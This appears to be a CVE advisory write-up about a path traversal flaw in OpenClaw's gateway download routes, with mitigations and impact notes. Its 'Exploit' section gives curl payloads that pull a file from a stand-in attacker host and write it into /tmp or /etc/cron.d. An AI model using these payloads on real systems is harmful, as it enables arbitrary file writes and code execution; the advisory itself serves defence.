Listen to this Post
The vulnerability resides in the browser download helpers within OpenClaw versions from 2026.1.12 up to 2026.2.12. Specifically, the `waitForDownloadViaPlaywright` and `downloadViaPlaywright` functions in `src/browser/pw-tools-core.downloads.ts` accepted an unsanitized output path for downloaded files. When these functions were invoked via the gateway browser control routes, specifically `/wait/download` and /download, an attacker could supply a path containing traversal sequences like ../../../. The application failed to validate or restrict this path, allowing it to write the downloaded file outside of the intended OpenClaw temporary downloads directory. Successful exploitation allows an attacker to write files to arbitrary locations on the file system. It is important to note that this issue is not exposed through the AI agent tool schema as there is no download action, and exploitation requires authenticated CLI access or a valid gateway RPC token. The vulnerability was fixed in version 2026.2.13 by modifying the gateway routes to restrict the output path to the `DEFAULT_DOWNLOAD_DIR` using a `resolvePathWithinRoot` function .
dailycve form:
Platform: OpenClaw
Version: 2026.1.12-2026.2.12
Vulnerability : Path Traversal
Severity: High
date: 2026-02-18
Prediction: 2026-02-14
What Undercode Say:
Analytics:
- Vulnerability Analysis: The core issue is a classic path traversal vulnerability (CWE-22) where unsanitized user input for a file path allows writing files outside the intended directory. The vulnerable entry points are the gateway browser control routes `/wait/download` and `/download` .
- Version Impact: All OpenClaw versions from 2026.1.12 up to, but not including, 2026.2.13 are vulnerable. The fixed version is 2026.2.13 .
- Exploitability: The attack vector is network-based, requires authentication to the gateway, and has low attack complexity. This is not a publicly exposed issue and requires prior access.
Exploit:
This is a hypothetical example based on the vulnerability description.
Assumes you have an authenticated RPC token and the gateway is reachable.
1. Set up a malicious file to be downloaded? No, the exploit is in the output path.
The attacker controls where on the server the file is saved.
2. Command to trigger the path traversal via the download route.
Replace <gateway_url>, <token>, and <malicious_download_url> with actual values.
The 'path' parameter is the traversal payload.
curl -X POST <gateway_url>/download \
-H "Authorization: Bearer <your_authenticated_token>" \
-H "Content-Type: application/json" \
-d '{
"url": "http://attacker.com/malicious.exe",
"path": "../../../../tmp/evil.exe"
}'
Alternative for the /wait/download route, which might wait for a triggered download.
curl -X POST <gateway_url>/wait/download \
-H "Authorization: Bearer <your_authenticated_token>" \
-H "Content-Type: application/json" \
-d '{
"path": "../../../../etc/cron.d/evil"
}'
Protection from this CVE:
Immediate mitigation: Upgrade to the patched version. npm install [email protected] Verify the installation. npm list openclaw | grep 2026.2.13 If an upgrade is not immediately possible, restrict access to the gateway. Ensure the gateway is not exposed beyond the loopback interface. Enforce strong, unique authentication tokens for all RPC calls. Monitor gateway logs for attempts to use path traversal sequences (../). Example: Use iptables to block external access to the gateway port if it is bound to all interfaces. iptables -A INPUT -p tcp --dport <gateway_port> ! -s 127.0.0.1 -j DROP Check logs for exploitation attempts. sudo grep -E '../|/etc/|/tmp/' /var/log/openclaw/gateway.log | grep -E 'download|wait/download'
Impact:
Successful exploitation allows an attacker with authenticated access to write files to arbitrary locations on the gateway host’s file system . This could lead to the placement of malicious files (e.g., scripts, binaries, or cron jobs) in sensitive directories, potentially resulting in remote code execution, privilege escalation, or system destabilization. The confidentiality impact is low, but the integrity and availability impacts are high as file contents can be overwritten.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

